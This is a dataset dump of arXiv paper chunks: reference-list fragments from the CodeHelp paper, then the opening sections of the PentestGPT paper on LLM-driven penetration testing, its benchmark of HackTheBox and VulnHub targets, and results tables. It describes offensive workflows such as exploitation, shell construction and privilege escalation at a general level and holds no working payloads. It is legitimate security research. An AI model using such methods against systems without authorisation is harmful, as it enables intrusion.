2308.06921#65 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Automatic Gen- eration of Programming Exercises and Code Explanations Using Large Language Models. In Proceedings of the 2022 ACM Conference on International Computing Education Research V.1. ACM, Lugano and Virtual Event Switzerland, 27â 43. https://doi.org/10.1145/3501385.3543957 Jaromir Savelka, Arav Agarwal, Marshall An, Chris Bogart, and Majd Sakr. 2023. Thrilled by Your Progress! Large Language Models (GPT-4) No Longer Struggle to Pass Assessments in Higher Education Programming Course. In Proceedings of the 2023 ACM Conference on International Computing Education Research V.1. ACM. Jaromir Savelka, Arav Agarwal, Christopher Bogart, and Majd Sakr. 2023. | 2308.06921#64 | 2308.06921#66 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#66 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Large Language Models (GPT) Struggle to Answer Multiple-Choice Questions about Code. arXiv:2303.08033 [cs.CL] [33] Haoye Tian, Weiqi Lu, Tsz On Li, Xunzhu Tang, Shing-Chi Cheung, Jacques Klein, and Tegawendé F. Bissyandé. 2023. Is ChatGPT the Ultimate Programming Assistant â How far is it? arXiv:2304.11938 [cs.SE] James Walden, Nicholas Caporusso, and Ludiana Atnafu. 2022. A Chatbot for Teaching Secure Programming. In Proceedings of the EDSIG Conference ISSN, Vol. 2473. 4901. Jason Wei, Xuezhi Wang, Dale Schuurmans, Maarten Bosma, Brian Ichter, Fei Xia, Ed Chi, Quoc Le, and Denny Zhou. 2023. Chain-of-Thought Prompting Elicits Reasoning in Large Language Models. arXiv:2201.11903 [cs.CL] [36] Laura Weidinger, Jonathan Uesato, Maribeth Rauh, Conor Griffin, Po-Sen Huang, John Mellor, Amelia Glaese, Myra Cheng, Borja Balle, Atoosa Kasirzadeh, Court- ney Biles, Sasha Brown, Zac Kenton, Will Hawkins, Tom Stepleton, Abeba Birhane, Lisa Anne Hendricks, Laura Rimell, William Isaac, Julia Haas, Sean Legassick, Geoffrey Irving, and Iason Gabriel. 2022. Taxonomy of Risks Posed by Language Models. In 2022 ACM Conference on Fairness, Accountability, and Trans- parency (Seoul, Republic of Korea) (FAccT â 22). Association for Computing Ma- chinery, New York, NY, USA, 214â 229. https://doi.org/10.1145/3531146.3533088 [37] Terry Yue Zhuo, Yujin Huang, Chunyang Chen, and Zhenchang Xing. 2023. | 2308.06921#65 | 2308.06921#67 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#67 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Red teaming ChatGPT via Jailbreaking: Bias, Robustness, Reliability and Toxicity. arXiv:2301.12867 [cs.CL] | 2308.06921#66 | 2308.06921 | [
"2304.03938"
]
|
|
2308.06782#0 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 3 2 0 2 g u A 3 1 ] E S . s c [ 1 v 2 8 7 6 0 . 8 0 3 2 : v i X r a # PENTESTGPT: An LLM-empowered Automatic Penetration Testing Tool Gelei Deng1, Yi Liu1, V´ıctor Mayoral-Vilches2,3 , Peng Liu4, Yuekang Li5, Yuan Xu 1, Tianwei Zhang1, Yang Liu1, Martin Pinzger2, and Stefan Rass6 1Nanyang Technological University, 2Alpen-Adria-Universit¨at Klagenfurt, 3Alias Robotics, 4Instituite for Infocomm Research, A*STAR, 5University of New South Wales, 6Johannes Kepler University Linz {gelei.deng, yi009, xu.yuan, tianwei.zhang, yangliu}@ntu.edu.sg, [email protected] liu [email protected], [email protected], [email protected] | 2308.06782#1 | 2308.06782 | [
"2305.13860"
]
|
|
2308.06782#1 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Abstractâ Penetration testing, a crucial industrial practice for ensuring system security, has traditionally resisted automation due to the extensive expertise required by human profes- sionals. Large Language Models (LLMs) have shown signif- icant advancements in various domains, and their emergent abilities suggest their potential to revolutionize industries. In this research, we evaluate the performance of LLMs on real- world penetration testing tasks using a robust benchmark created from test machines with platforms. Our findings reveal that while LLMs demonstrate proficiency in specific sub-tasks within the penetration testing process, such as using testing tools, interpreting outputs, and proposing subsequent actions, they also encounter difficulties maintaining an integrated un- derstanding of the overall testing scenario. In response to these insights, we introduce PENTEST- GPT, an LLM-empowered automatic penetration testing tool that leverages the abundant domain knowledge inherent in LLMs. PENTESTGPT is meticulously designed with three self-interacting modules, each addressing individual sub-tasks of penetration testing, to mitigate the challenges related to context loss. Our evaluation shows that PENTESTGPT not only outperforms LLMs with a task-completion increase of 228.6% compared to the GPT-3.5 model among the benchmark targets but also proves effective in tackling real-world penetration testing challenges. Having been open-sourced on GitHub, PEN- TESTGPT has garnered over 4,700 stars and fostered active community engagement, attesting to its value and impact in both the academic and industrial spheres. | 2308.06782#0 | 2308.06782#2 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#2 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Index Termsâ security, offensive, cybersecurity, pentesting # 1. Introduction attempt breaches of an organizationâ s defenses to uncover vulnerabilities. They offer marked advantages over tradi- tional defensive mechanisms, reliant on incomplete system knowledge and modeling. Guided by the principle â the best defense is a good offenseâ , this study focuses on offensive strategies, particularly penetration testing. Penetration testing [2] is a proactive offensive technique aiming at identifying, assessing, and mitigating as many security vulnerabilities as possible. This involves executing targeted attacks to confirm diverse flaws (e.g., erratic behav- iors) and is efficacious in creating a comprehensive inven- tory of vulnerabilities complemented by actionable enhance- ment recommendations. As a widely-employed practice for security appraisal, penetration testing empowers organiza- tions to discern and neutralize potential vulnerabilities in their networks and systems before exploitation by malicious entities. Despite its significance, the industry often leans on manual techniques and specialized knowledge [3], making it labor-intensive. This has generated a gap in responding to the escalating demand for adept and efficient security evaluations. | 2308.06782#1 | 2308.06782#3 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#3 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Recently Large Language Models (LLMs) [4], [5] are making striking progress, exhibiting an increasingly nuanced understanding of human-like text and effectively executing various tasks across diverse domains. One intriguing aspect of LLMs is their emergent abilities [6], which are not explic- itly programmed but arise during the training process. These abilities enable LLMs to perform complex tasks such as reasoning, summarization, question-answering, and domain- specific problem-solving without requiring specialized train- ing. Such capabilities indicate the transformative potential of LLMs across various sectors, including cybersecurity. A critical question thus emerges: can LLMs be leveraged in cybersecurity, particularly for performing automated pene- tration testing? Guaranteeing a systemâ s immunity to potential attacks is a formidable challenge. Offensive security methods, such as penetration testing (pen-testing) or red teaming, have become essential in the security lifecycle. As detailed by Applebaum [1], these methods require security teams to to evaluate the capabilities of LLMs on real-world penetration testing tasks. Unfortunately, the current benchmarks for penetration testing [7], [8] are not comprehensive and fail to assess | 2308.06782#2 | 2308.06782#4 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#4 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 1 O00 exploit flow graph adapters models state User programatically in Python 1. ExploitFlow Target parsing reasoning generation g o a l d e s c r i p ti o n i n exchange exploittree B e n c h m a r k s t e x t a n 2. PentestGPT 2. PentestGPT e x p l o i t External entity fl o w Other future papers This paper 4. | 2308.06782#3 | 2308.06782#5 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#5 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Malism Inner Component 3. PentestPerf Figure 1: Architecture of our framework to develop a fully automated penetration testing tools, MALISM. Figure depicts the various interaction flows that an arbitrary User could follow using MALISM to pentest a given Target. 1. Corresponds with EXPLOITFLOW, a modular library to produce security exploitation routes (exploit flows) that caputures the state of the system being tested in a flow after every discrete action. 2. (this paper) Corresponds with PENTESTGPT, a testing tool that leverages the power of LLMs to produce testing guidance (heuristics) for every given discrete state. 3. PENTESTPERFis a comprehensive penetration testing benchmark to evaluate the performances of penetration testers and automated tools across a wide array of testing targets. 4. captures MALISM, our framework to develop fully automated penetration testing tools which we name cybersecurity cognitive engines. | 2308.06782#4 | 2308.06782#6 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#6 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | progressive accomplishments fairly during the process. To address this limitation, we construct a robust benchmark that includes test machines from HackTheBox [9] and VulnHub [10]â two leading platforms for penetration test- ing challenges. Comprising 13 targets with 182 sub-tasks, our benchmark encompasses all vulnerabilities appearing in OWASPâ s top 10 vulnerability list [11]. Also, it offers a more detailed evaluation of the testerâ s performance by monitoring the completion status for each sub-task. | 2308.06782#5 | 2308.06782#7 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#7 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Armed with this benchmark, we conduct an exploratory study using GPT-3.5 [12], GPT-4 [13], and Bard [14] as representative LLMs. We interactively test these models by guiding them to complete the penetration tasks against our benchmark targets. This interaction involves setting a penetration testing goal for the LLM, soliciting it for the appropriate operation to execute, implementing it in the testing environment, and feeding the test outputs back to the LLM for next-step reasoning (Figure 2). By repeating this cycle, we derive the final penetration testing results. To evaluate the performance of the LLMs, we compare their results against baseline solutions provided by offi- cial walkthroughs and solutions from certified penetration testers. By analyzing similarities and differences in their problem-solving approaches, we aim to better understand LLMsâ penetration testing capabilities and discern how their problem-solving strategies diverge from those of human # experts. Our investigation yields intriguing insights into the capa- bilities and limitations of LLMs in penetration testing. We discover that LLMs demonstrate proficiency in managing specific sub-tasks within the testing process, such as utiliz- ing testing tools, interpreting their outputs, and suggesting subsequent actions. Compared to human experts, LLMs are especially adept at executing complex commands and options with testing tools, while models like GPT-4 excel in comprehending source code and pinpointing vulnerabilities. Furthermore, LLMs can craft appropriate test commands and accurately describe graphical user-interface operations needed for specific tasks. Leveraging their vast knowledge base, they can design inventive testing procedures to un- veil potential vulnerabilities in real-world systems and CTF challenges. However, we also note that LLMs have difficulty in maintaining a coherent grasp of the overarching testing scenario, a vital aspect for attaining the testing goal. As the dialogue advances, they may lose sight of earlier discoveries and struggle to apply their reasoning consistently toward the final objective. Additionally, LLMs might overemphasize recent tasks in the conversation history, regardless of their vulnerability status. As a result, they tend to neglect other potential attack surfaces exposed in prior tests and fail to complete the penetration testing task. The outcomes of our empirical study are promising, re- | 2308.06782#6 | 2308.06782#8 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#8 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 2 vealing that LLMs possess the necessary domain knowledge to perform penetration testing tasks. In particular, they are great at providing an intuition of what to do in a given networking scenario. However, what they lack is effective guidance to carry out these tasks independently and maintain a cohesive grasp of the testing scenario. On the other hand, as investigated in a prior research publication [] focused on capturing the exploitation route (or flow) for automation. Given the complexity of the (network) state space, the state itself is not enough to reason about what are the best actions to pentest. It rapidly becomes evident that a heuristic is needed to support autonomous pentesting which helps pick actions to achieve given goals. With this understanding, we aim to contribute unlocking the potential of modern machine learning approaches and develop a fully automated penetration testing framework that helps produce cybersecu- rity cognitive engines. Our overall architecture is depicted in Figure 1, which shows our current work so far and near future planned contributions. Our proposed framework, MALISM, is designed to enable a user without in-depth security domain knowledge to produce its own cybersecurity cognitive engine that helps conduct penetration testing over an extensive range of targets. This framework comprises three primary components: 1) EXPLOITFLOW []: A modular library to produce cyber security exploitation routes (exploit flows). EXPLOIT- FLOW aims to combine and compose exploits from different sources and frameworks, capturing the state of the system being tested in a flow after every discrete action which allows learning attack trees that affect a given system. EXPLOITFLOWâ | 2308.06782#7 | 2308.06782#9 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#9 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | s main motivation is to facilitate and empower Game Theory and Artificial Intelligence (AI) research in cyber security. It provides a unique representation of the exploitation process that encodes every facet within it. Its representation can be effectively integrated with various penetration testing tools and scripts, such as Metasploit [15] to perform end-to-end penetration testing. Such representation can be further visualized to guide the human experts for the reproduction of the testing process. 2) PENTESTGPT (this paper): An automated penetration testing system that leverages the power of LLMs to produce testing guidance and intuition at every given discrete state. It functions as the core component of the MALISM framework, guiding the LLMs to efficiently utilize their domain knowledge in real-world testing scenarios. 3) PENTESTPERF: A comprehensive penetration testing benchmark developed to evaluate the performances of penetration testers and automated tools across a wide array of testing targets. It offers a fair and robust platform for performance comparison. The harmonious integration of these three components forms an automated, self-evolving penetration testing frame- work capable of executing penetration tests over various targets, MALISM. This framework to develop fully auto- mated penetration testing tools, which we name cyberse- | 2308.06782#8 | 2308.06782#10 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#10 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 3 curity cognitive engines, aims to revolutionize the field of penetration testing by significantly reducing the need for domain expertise and enabling more comprehensive and reliable testing. Building on our insights into LLMsâ capabilities in penetration testing, we present PENTESTGPT, an interactive system designed to enhance the application of LLMs in this domain. Drawing inspiration from the collaborative dynamics commonly observed in real-world human pen- etration testing teams, PENTESTGPT is particularly tai- lored to manage large and intricate projects. It features a tripartite architecture comprising Reasoning, Generation, and Parsing Modules, each reflecting specific roles within penetration testing teams. The Reasoning Module emulates the function of a lead tester, focusing on maintaining a high-level overview of the penetration testing status. We introduce a novel representation, the Pentesting Task Tree (PTT), based on the cybersecurity attack tree [16]. This structure encodes the testing processâ | 2308.06782#9 | 2308.06782#11 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#11 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | s ongoing status and steers subsequent actions. Uniquely, this representation can be translated into natural language and interpreted by the LLM, thereby comprehended by the Generation Module and directing the testing procedure. The Generation Module, mirroring a junior testerâ s role, is responsible for construct- ing detailed procedures for specific sub-tasks. Translating these into exact testing operations augments the generation processâ s accuracy. Meanwhile, the Parsing Module deals with diverse text data encountered during penetration test- ing, such as tool outputs, source codes, and HTTP web pages. It condenses and emphasizes these texts, extracting essential information. Collectively, these modules function as an integrated system. PENTESTGPT completes a complex penetration testing task by bridging high-level strategies with precise execution and intelligent data interpretation, thereby maintaining a coherent and effective testing process. We evaluate PENTESTGPT using our benchmark to showcase its efficacy. Specifically, our system achieves remarkable performance gains, with 228.6% and 58.6% increases in sub-task completion compared to the direct usage of GPT-3.5 and GPT-4, respectively. We also apply PENTESTGPT to the HackTheBox active penetration testing machines challenge [17], completing 4 out of the 10 selected targets at a total OpenAI API cost of 131.5 US Dollars, ranking among the top 1% players in a community of over 670,000 members. This evaluation underscores PEN- TESTGPTâ s practical value in enhancing penetration testing tasksâ efficiency and precision. The solution has been made publicly available on GitHub1, receiving widespread acclaim with over 4,700 stars to the date of writing, active commu- nity engagement, and ongoing collaboration with multiple industrial partners. In summary, we make the following contributions: â ¢ Development of a Comprehensive Penetration Testing Benchmark. We craft a robust and representative penetra- tion testing benchmark, encompassing a multitude of test | 2308.06782#10 | 2308.06782#12 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#12 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 1. For anonymity during the review process, we have created an anony- mous repository to open-source our solution [18]. machines from leading platforms such as HackTheBox and VulnHub. This benchmark includes 182 sub-tasks covering OWASPâ s top 10 vulnerabilities, offering fair and comprehensive evaluation of penetration testing. â ¢ Empirical Evaluation of LLMs for Penetration Testing Tasks. By employing models like GPT-3.5, GPT-4, and Bard, our exploratory study rigorously investigates the strengths and limitations of LLMs in penetration testing. The insights gleaned from this analysis shed valuable light on the capabilities and challenges faced by LLMs, enriching our understanding of their applicability in this specialized domain. | 2308.06782#11 | 2308.06782#13 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#13 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | â ¢ Development of an Innovative LLM-powered Penetra- tion Testing System. We engineer PENTESTGPT, a novel interactive system that leverages the strengths of LLMs to carry out penetration testing tasks automatically. Draw- ing inspiration from real-world human penetration testing teams, PENTESTGPT integrates a tripartite design that mirrors the collaborative dynamics between senior and junior testers. This architecture optimizes LLMsâ usage, significantly enhancing the efficiency and effectiveness of automated penetration testing. | 2308.06782#12 | 2308.06782#14 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#14 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 2. Background & Related Work # 2.1. Penetration Testing Penetration testing, or â pentestingâ , is a critical practice to enhance organizational systemsâ security. In a typical penetration test, security professionals, known as penetration testers, analyze the target system, often leveraging auto- mated tools. The standard process is divided into seven phases [19]: Reconnaissance, Scanning, Vulnerability As- sessment, Exploitation, and Post Exploitation (including reporting). These phases enable testers to understand the target system, identify vulnerabilities, and exploit them to gain access. Despite substantial efforts [8], [20], [21] in the field, a fully automated penetration testing pipeline remains elusive. The challenges in automating the process arise from the comprehensive knowledge needed to understand and manip- ulate various vulnerabilities and the demand for a strategic plan to guide subsequent actions. In practice, penetration testers often use a combined approach integrating depth- first and breadth-first search techniques [19]. They begin by obtaining an overarching understanding of the target envi- ronment (utilizing a breadth-first approach) before focusing on specific services and vulnerabilities (employing a depth- first approach). This strategy ensures a thorough system analysis while prioritizing promising attack vectors, rely- ing heavily on individual experience and domain expertise. Additionally, penetration testing requires many specialized tools with unique features and functions. This diversity adds complexity to the automation process. Therefore, even with the support of artificial intelligence, creating a fully unified solution for automated penetration testing remains a formidable challenge. | 2308.06782#13 | 2308.06782#15 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#15 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 4 # 2.2. Large Language Models Large Language Models (LLMs), including OpenAIâ s GPT-3.5 and GPT-4, are prominent tools with applications extending to various cybersecurity-related fields, such as code analysis [22] and vulnerability repairment [23]. These models are equipped with wide-ranging general knowledge and the capacity for elementary reasoning. They can com- prehend, infer, and produce text resembling human commu- nication, aided by a training corpus encompassing diverse domains like computer science and cybersecurity. Their ability to interpret context and recognize patterns enables them to adapt knowledge to new scenarios. This adaptability, coupled with their proficiency in interacting with systems in a human-like way, positions them as valuable assets in enhancing penetration testing processes. Despite inherent limitations, LLMs offer distinct attributes that can substan- tially aid in the automation and improvement of penetration testing tasks. The realization of this potential, however, requires the creation and application of a specialized and rigorous benchmark. | 2308.06782#14 | 2308.06782#16 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#16 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 3. Penetration Testing Benchmark # 3.1. Motivation The fair evaluation of Large Language Models (LLMs) in penetration testing necessitates a robust and representative benchmark. Existing benchmarks in this domain [7], [8] have several limitations. First, they are often restricted in scope, focusing on a narrow range of potential vulnerabili- ties, and thus fail to capture the complexity and diversity of real-world cyber threats. For instance, the OWASP bench- mark juiceshop [24] is commonly adopted for evaluating web vulnerability testing. However, it does not touch the concept of privilege escalation, which is an essential aspect of penetration testing. Second, existing benchmarks may not recognize the cumulative value of progress through the different stages of penetration testing, as they tend to evaluate only the final exploitation success. This approach overlooks the nuanced value each step contributes to the overall process, resulting in metrics that might not accurately represent actual performance in real-world scenarios. To address these concerns, we propose the construc- tion of a comprehensive penetration testing benchmark that meets the following criteria: | 2308.06782#15 | 2308.06782#17 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#17 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Task Variety. The benchmark must encompass diverse tasks, reflecting various operating systems and emulating the diversity of scenarios encountered in real-world penetration testing. Challenge Levels. To ensure broad applicability, the bench- mark must include tasks of varying difficulty levels suitable for challenging novice and expert testers. Progress Tracking. Beyond mere success or failure met- rics, the benchmark must facilitate tracking of incremental progress, thereby recognizing and scoring the value added at each stage of the penetration testing process. # 3.2. Benchmark Design Following the criteria outlined previously, we develop a comprehensive benchmark that closely reflects real-world penetration testing tasks. The design process progresses through several stages. Task Selection. Our first step is to meticulously select tasks from HackTheBox [9] (HTB) and VulnHub [10]. These platforms are widely recognized and frequently utilized for penetration testing practice. Our selection process is guided by a desire to incorporate a diverse and challenging set of tasks. Capture The Flag (CTF) exercises and real-world testing scenarios have been included. The targets are drawn from various operating systems and encompass a broad spectrum of vulnerabilities. This approach ensures a wide representation of real-world penetration testing tasks. To account for different skill levels, the selected tasks cover a broad range of difficulty. While HTB and VulnHub offer reference difficulty levels, we further validate these with input from three certified penetration testers2, including the authors of this work. This collaborative process yields a consensus on the final difficulty rating for each target, align- ing with the conventional categorization [10] of penetration testing machines into easy, medium, and hard levels. It is worth noting that our benchmark does not explicitly include benign targets for evaluating false positives. This is because the iterative and exploratory nature of penetration testing inherently involves investigating services within the target that may ultimately be deemed benign. In this process, our primary focus is successfully identifying genuine vulnera- bilities. | 2308.06782#16 | 2308.06782#18 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#18 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Task Decomposition. We further parse the testing process of each target into a series of sub-tasks, following the stan- dard solution commonly referred to as the â walkthroughâ in penetration testing. Each sub-task corresponds to a unique step in the overall process. Specifically, a sub-task may represent a micro-step involving the use of a particular penetration testing tool (e.g., performing port scanning with nmap [25]) or exploiting a unique vulnerability identified in the Common Weakness Enumeration (CWE) [26] (e.g., exploiting SQL injection). To standardize decomposition, we arrange the sub-tasks into a two-layer structure. Initially, we categorize each sub-task according to the five phases of penetration testing, as described in Section 2. Then, we label the sub-task with either the corresponding CWE item it targets or the specific tools employed. These two steps enable us to formulate an exhaustive list of sub-tasks for every benchmark target. We include this list in Appendix 6, and the complete sub-task information is accessible on our anonymous open-source project [18]. Benchmark Validation. The final stage of our benchmark development involves rigorous validation. This step ensures that our benchmark accurately reflects real-world penetra- tion testing scenarios and offers reproducibility. During validation, three certified penetration testers independently 2. Our penetration testers are all Offensive Security Certified Profession- als (OSCP). 5 attempt the penetration testing targets, refining the sub-tasks as needed. We adjust our task decomposition accordingly because some targets may have multiple valid solutions. By the end, we compile a benchmark of 13 penetration testing targets with 182 sub-tasks in 25 categories. The benchmark includes all types of vulnerabilities as listed in the OWASP [11] Top 10 Project. Detailed information on the included categories is listed in the Appendix Section 6. To contribute to community development, we have made this benchmark publicly available online at our anonymous project website [18]. # 4. Exploratory Study We conduct an exploratory study to assess the capabil- ities of LLMs in penetration testing. Our primary objective is determining how well LLMs can adapt to the real-world complexities and challenges associated with penetration test- ing tasks. Specifically, we aim to address the following two research questions: RQ1 (Capability): To what extent can LLMs perform pen- etration testing tasks? RQ2 (Comparative Analysis): | 2308.06782#17 | 2308.06782#19 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#19 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | How do the problem- solving strategies of human penetration testers and LLMs differ? We utilize the benchmark described in Section 3 to evaluate the performance of LLMs on penetration testing tasks. In the following, we first delineate our testing strategy for this study. Subsequently, we present the testing results and an analytical discussion to address the above research questions. # 4.1. Testing Strategy LLMs cannot perform penetration tests directly. Their capabilities are primarily text-based, responding to queries and providing suggestions. However, penetration testing of- ten involves operations with user interfaces (UI) and un- derstanding graphical information, such as website images. This necessitates a bridge between the test machine and the LLM to facilitate task completion. We introduce an interactive loop structure to evaluate the LLMâ s abilities in penetration testing within our benchmark. This process, depicted in Figure 2, consists of the following stages: â ¶ We present the target information to the LLM and request recommendations for penetration testing actions. This initiates a looped testing procedure. â · We implement the actions suggested by the LLM, which encompass both terminal commands and graphical interactions. â ¸ We gather the results of the actions. Text-based output, such as terminal responses or source code, is recorded directly. Human pen- etration testers provide concise summaries and descriptions for non-textual results (e.g., images). The summarized infor- mation is returned to the LLM to inform subsequent actions. â ¹ This cycle continues until we identify a solution or reach a standstill. We compile a record of the testing procedures, encompassing successful tasks, ineffective actions, and any reasons for failure, if applicable. TABLE 1: Overall performance of LLMs on Penetration Testing Benchmark. | 2308.06782#18 | 2308.06782#20 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#20 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Easy Medium Hard Average Tools Overall (7) Sub-task (77) Overall (4) Sub-task (71) Overall (2) Sub-task (34) Overall (13) Sub-task (182) GPT-3.5 GPT-4 Bard 1 (14.29%) 4 (57.14%) 2 (28.57%) 24 (31.17%) 52 (67.53%) 29 (37.66%) 0 (0.00%) 1 (25.00%) 0 (0.00%) 13 (18.31%) 27 (38.03%) 16 (22.54%) 0 (0.00%) 0 (0.00%) 0 (0.00%) 5 (14.71%) 8 (23.53%) 5 (14.71%) 1 (7.69%) 5 (38.46%) 2 (15.38%) 42 (23.07%) 87 (47.80%) 50 (27.47%) Average 2.3 (33.33%) 35 (45.45%) 0.33 (8.33%) 18.7 (26.29%) 0 (0.00%) 6 (17.64%) 2.7 (20.5%) 59.7 (32.78%) Penetration Testing Goal Q (e}) Human Expert Flag and Conclusion Obtained 1 1 1 1 | © Data D Entity Figure 2: Overview of strategy to use LLMs for penetration testing. ners such as Nexus [30] and OpenVAS [31]. Consequently, we explicitly instruct the LLMs to refrain from using these tools. However, we follow the LLMsâ recommendations for utilizing other tools designed to validate specific vulnerabil- ity types (e.g., sqlmap [32] for SQL injections). Occasion- ally, versioning discrepancies may lead the LLMs to provide incorrect instructions for tool usage. In such instances, our penetration testing experts evaluate whether the instructions would have been valid for a previous version of the tool. They then make any necessary adjustments to ensure the toolâ s correct operation. # 4.2. Evaluation Settings # 4.3. Capability Evaluation (RQ1) | 2308.06782#19 | 2308.06782#21 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#21 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | We proceed to assess the performances of various LLMs in penetration testing tasks using the strategy mentioned above. Model Selection. Our study focuses on three cutting-edge LLMs that are currently accessible: GPT-3.5 and GPT-4 from OpenAI and LaMDA [27] from Google. These models are selected based on their prominence in the research com- munity and consistent availability. To interact with the LLMs mentioned above, we utilize chatbot services provided by OpenAI and Google, namely ChatGPT [28] and Bard [14]. For this paper, the terms GPT-3.5, GPT-4, and Bard will represent these three LLMs. | 2308.06782#20 | 2308.06782#22 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#22 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Experimental Setup. We conduct our experiments in a local environment where the target and testing machines are part of the same private network. The testing machine operates on Kali Linux [29], version 2023.1. Several measures are implemented to validate the effectiveness of our testing procedures. First, we repeat the tests to account for inherent variability in the LLM outputs. In particular, we test each target with each LLM five times. We performed 195 tests in total, i.e., 5 repetitions * 3 models * 13 targets. In this process, a sub-task is considered successful if it succeeds in at least one trial, and a penetration task is considered successful as long as one trial succeeds. | 2308.06782#21 | 2308.06782#23 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#23 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Second, we make the best efforts to translate UI operations and graphical information into natural languages accurately. In addition, we ensure the precise execution of the instructions provided by the LLMs. Third, we maintain the integrity of the testing process by strictly limiting the testerâ s role to executing actions and reporting results without adding expert knowl- edge or guidance. Finally, the testing and target machines are rebooted after each test to reset their states, ensuring a consistent starting point for each test. Tool Usage. Our study aims to assess the innate capabilities of LLMs without reliance on automated vulnerability scan- To study RQ1, we begin by assessing the overall perfor- mance of three prominent LLMs: GPT-4, Bard, and GPT- 3.5. The results of these evaluations are compiled in Table 1. The experimental results show that the three LLMs com- pleted at least one end-to-end penetration testing task. This achievement underscores their ability to conduct a broad spectrum of testing operations, particularly within environ- ments of less complexity. Among the models, GPT-4 stands out with superior performance, achieving success with 4 targets of easy difficulty and 1 of medium difficulty. Bard and GPT-3.5 also demonstrate commendable capabilities, completing 2 and 1 targets of easy difficulty, respectively. When examining sub-tasks, GPT-4 accomplishes 52 of 77 on easy difficulty targets and 27 out of 71 on medium ones, underlining its potential for significant contributions to more complex penetration testing scenarios. Though not as proficient as GPT-4, GPT-3.5 and Bard still show promise, completing 13 (18.31%) and 16 (22.54%) of sub-tasks on medium difficulty targets, respectively. However, the perfor- mance of all three models noticeably diminishes when chal- lenged with hard difficulty targets. While each model can complete the initial reconnaissance phase on these targets, they fall short in exploiting the identified vulnerability. This outcome is not entirely unexpected, as the hard difficulty machines are deliberately crafted to be exceedingly difficult. They often include services that appear vulnerable but are, in fact, non-exploitableâ a trait commonly referred to as rabbit holes [33]. Additionally, the routes to successfully exploiting these machines are typically inventive and unforeseeable, making them resistant to straightforward replication by au- tomated tools. | 2308.06782#22 | 2308.06782#24 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#24 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | For instance, the benchmark target Falafel involves deliberately crafted SQL injection vulnerabilities, which are resistant to sqlmap and can only be exploited through manually designed payloads. Existing LLMs do 6 not exhibit the capability to solve them solely without the guidance of human experts. Finding 1: Large Language Models (LLMs) have shown proficiency in conducting end-to-end penetration testing tasks but struggle to overcome challenges presented by more difficult targets. TABLE 2: Top 10 Types of Sub-tasks completed by each tool. Sub-Tasks Walkthrough GPT-3.5 GPT-4 General Tool Usage Port Scanning Web Enumeration Code Analysis Shell Construction Directory Exploitation General Privilege Escalation Flag Capture Passowrd/Hash Cracking Network Exploitation 25 9 18 18 11 11 8 8 8 7 4 9 4 4 3 1 2 1 2 1 10 9 8 5 7 7 4 5 4 3 Bard 7 9 4 4 4 1 3 2 2 2 We further examine the detailed sub-task completion performances of the three LLMs, as presented in Table 2. Analyzing the completion status, we identify several areas where LLMs excel. First, they adeptly utilize common pen- etration testing tools to interpret the corresponding outputs, especially in enumeration tasks correctly. For example, all three evaluated LLMs successfully perform all nine Port Scanning sub-tasks. They can configure the widely-used port scanning tool, nmap [25], comprehend the scan results, and formulate subsequent actions. Second, the LLMs reveal a deep understanding of prevalent vulnerability types, con- necting them to the services on the target system. This understanding is evidenced by the successful completion of sub-tasks related to various vulnerability types. Finally, LLMs demonstrate their effectiveness in code analysis and generation, particularly in the tasks of Code Analysis and Shell Construction. These tasks require the models to read and generate codes in different programming languages, essential in penetration testing. This often culminates in identifying potential vulnerabilities from code snippets and crafting the corresponding exploits. Notably, GPT-4 outper- forms the other two models regarding code interpretation and generation, marking it the most suitable candidate for penetration testing tasks. | 2308.06782#23 | 2308.06782#25 | 2308.06782 | [
"2305.13860"
]
|
